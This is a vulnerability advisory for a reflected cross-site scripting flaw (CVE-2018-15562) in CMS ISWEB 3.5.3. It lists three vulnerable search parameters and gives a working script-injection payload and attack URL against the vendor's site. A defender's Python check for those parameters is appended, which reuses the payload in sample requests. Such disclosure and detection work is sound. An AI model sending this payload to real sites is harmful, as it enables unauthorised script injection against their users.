CMS ISWEB 3.5.3 Cross Site Scripting

2018-08-28T00:00:00
ID PACKETSTORM:149109
Type packetstorm
Reporter Thiago Sena
Modified 2018-08-28T00:00:00

Description

                                        
`CMS ISWEB 3.5.3 XSS Reflected  
  
> CVE  
  
CVE-2018-15562  
  
> Vulnerable parameters:  
  
ordineRis  
sezioneRicerca  
oggettiRicerca  
  
> PoC screenshot: https://i.imgur.com/5YpESoC.png  
  
> Vendor of Product  
http://www.isweb.it  
  
  
> Attack Type  
Remote  
  
> Attack Vectors  
Payload:"><svg/onload=alert(String.fromCharCode(88,83,83))>  
URL: http://www.isweb.it/index.php?azione=cerca&id_sezione=505&ordineRis=default&sezioneRicerca=505&oggettiRicerca="><svg/onload=alert(String.fromCharCode(88,83,83))>  
  
> Discoverer  
Offensive0Labs - Thiago "thxsena" Sena & Rafael Fontes Souza  
  
  
`
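
A defender's check for the vector above, added here as an example; it is not part of the original advisory or the vendor's code. It flags requests in which any of the three listed parameters carries HTML metacharacters after URL decoding, and shows the entity-encoded form of the value. The host `cms.example`, the search term `bando` and the sample requests are constructed, and the output context the CMS reflects into (HTML text or a quoted attribute) is an assumption.

```python
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters the advisory lists as vulnerable.
AFFECTED_PARAMS = {"ordineRis", "sezioneRicerca", "oggettiRicerca"}
# Characters that can close a quoted attribute or open a tag.
MARKUP_CHARS = re.compile(r"[\"'<>]")

def audit_request(url):
    """Return one finding per affected parameter whose decoded value has markup."""
    findings = []
    # parse_qsl percent-decodes once, matching what the application receives.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name in AFFECTED_PARAMS and MARKUP_CHARS.search(value):
            findings.append({
                "param": name,
                "raw": value,
                # Safe for HTML text and quoted attribute values only,
                # not for script or URL contexts (assumed context).
                "encoded": html.escape(value, quote=True),
            })
    return findings

# Constructed sample requests (hypothetical host), built from the advisory's URL.
BASE = ("http://cms.example/index.php?azione=cerca&id_sezione=505"
        "&ordineRis=default&sezioneRicerca=505&oggettiRicerca=")
SAMPLES = [
    BASE + "bando",
    BASE + '"><svg/onload=alert(String.fromCharCode(88,83,83))>',
    BASE + "%22%3E%3Csvg/onload=alert(String.fromCharCode(88,83,83))%3E",
]

if __name__ == "__main__":
    for url in SAMPLES:
        for f in audit_request(url):
            print(f["param"], "->", f["encoded"])
```

The same scan can be run over the request paths in a web server access log to find past attempts against these parameters.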